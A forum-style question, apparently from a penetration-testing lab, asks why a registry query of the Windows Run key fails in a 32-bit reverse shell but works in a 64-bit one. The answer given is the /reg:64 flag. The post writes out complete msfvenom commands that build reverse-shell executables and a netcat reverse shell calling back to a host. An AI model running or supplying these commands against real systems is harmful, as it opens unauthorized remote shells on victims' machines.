Got a curious issue I’m hoping to get an answer to. I’m doing a reverse shell using msfvenom. Depending on how I create it, the following command will or will not show results:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
If I use the following reverse shell, that commands returns the contents of the registry key:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.20.1 LPORT=4343 -f exe -o revshell.exe
But if I use this or just create a netcat shell {nc 172.16.20.1 4343 -e cmd.exe), the reg query fails:
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.20.1 LPORT=4343 -f exe -o revshell.exe
The Windows OS is 64-bit so I’m assuming it has something to do with that but I’d like to get a better understand of why one works and the other doesn’t. Can someone offer some guidance?
Update:
To get that to work, you can append the /reg:64 to the end of the reg query:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /reg:64